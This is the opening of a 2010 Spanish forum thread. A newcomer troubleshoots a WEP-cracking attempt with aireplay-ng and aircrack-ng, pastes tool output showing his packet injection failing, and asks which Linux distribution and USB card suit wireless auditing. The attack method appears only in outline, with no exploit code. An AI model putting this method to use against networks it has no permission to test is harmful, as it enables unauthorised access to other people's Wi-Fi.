varias dudas crack WEP y tarjeta para auditoría

Foro sobre todo tipo de tecnologías Wireless: Wi-Fi, Bluetooth, IrDA

Moderador: Moderadores

varias dudas crack WEP y tarjeta para auditoría

Notapor javiers » Jue Jul 29, 2010 7:28 pm

Hola a todos!.

Es mi primer post y soy nuevo en esto así que no seáis muy crueles :D.

1. Crack Wep

Estoy experimentando con el arte del crackeo WEP siguiendo un buen manual disponible en la Web e aircrack: http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

El ataque es sencillo hasta para mí, asociarse con el AP, inyectar con aireplay solicitudes ARP y generar datos a lo bestia para romperlos con aircrack.

El caso es que los tests de inyección de la tarjeta (cuando la pongo en modo monitor) funcionan bien, pero aun asociándome al AP, no inyecta en el mismo paquetes nunca, nunca, nunca...:

Saving ARP requests in replay_arp-0729-192122.cap
You should also start airodump-ng to capture replies.
^Cad 2037 packets (got 0 ARP requests and 7 ACKs), sent 0 packets...(0 pps)

Y el caso es que el chip que lleva esta tarjeta (Ralink, es un RT2571WF que es lo mismo que un RT73) está perfectamente soportado por aircrack.

Sospecho que el NetworkManager de Ubuntu puede estar interfiriendo por algunso posts que he leído por ahí, pero no lo tengo claro.

Lo que me lleva a 2:

2. Distribución a Usar

¿Alguna distribución de Linux recomendada para estos menesteres?. Yo uso Ubuntu por mera comodidad

3. Tarjeta a comprar.

La verdad es que la tarjeta que uso es de calidad poco fiabley estoy buscando una mejor y bien soportada. Tiene que ser USB.

He visto algunas en http://www.comprawifi.com/ que tienen buena pinta, pero estaré encantado de recibir opiniones.

Un saludo y gracias de antemano.
The only way of finding the limits of the possible is by going beyond them into the impossible // Arthur C. Clarke
javiers
:-)

Re: varias dudas crack WEP y tarjeta para auditoría

Notapor vlan7 » Jue Jul 29, 2010 9:06 pm

Buenas,